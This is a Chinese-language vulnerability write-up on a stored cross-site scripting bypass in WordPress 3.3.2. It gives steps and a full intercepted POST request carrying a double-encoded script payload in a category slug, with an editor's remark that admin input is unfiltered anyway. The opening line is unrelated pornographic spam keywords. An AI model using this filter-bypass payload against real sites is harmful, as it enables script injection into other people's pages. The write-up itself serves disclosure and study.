欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

WordPress 3.3.2雞肋存儲(chǔ)型跨站漏洞的分析

  發(fā)布時(shí)間:2012-06-07 08:41:36   作者:佚名   我要評(píng)論
WordPress最新版本3.3.2存在一個(gè)雙字節(jié)編碼的存儲(chǔ)型跨站漏洞,可以bypass內(nèi)置的filter機(jī)制,但是利用起來(lái)有點(diǎn)雞肋
WordPress最新版本3.3.2存在一個(gè)雙字節(jié)編碼的存儲(chǔ)型跨站漏洞,可以bypass內(nèi)置的filter機(jī)制,但是利用起來(lái)有點(diǎn)雞肋,細(xì)節(jié)如下:
1:登錄管理賬戶
2:?jiǎn)螕舴诸?
3:填寫(xiě)跨站參數(shù),并用burp suite攔截請(qǐng)求
4:輸入%253cscript%253ealert%25281%2529%253c%252fscript%253e可以直接bypass
。
BURP請(qǐng)求數(shù)據(jù)包:

復(fù)制代碼
代碼如下:

POST /wordpress/wp-admin/edit-tags.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://www.dbjr.com.cn /wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b;
wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update

小編:雞肋,雞肋中的雞肋,minminmsn同學(xué)應(yīng)該是翻譯自國(guó)外的文章,沒(méi)有經(jīng)過(guò)詳細(xì)的測(cè)試,wordpress默認(rèn)的filter機(jī)制對(duì)管理員權(quán)限是不過(guò)濾的,所以不僅僅在分類里存在跨站,其他地方更是跨站多多。也許有其他的猥瑣的用途吧。
作者:freebuf

相關(guān)文章

最新評(píng)論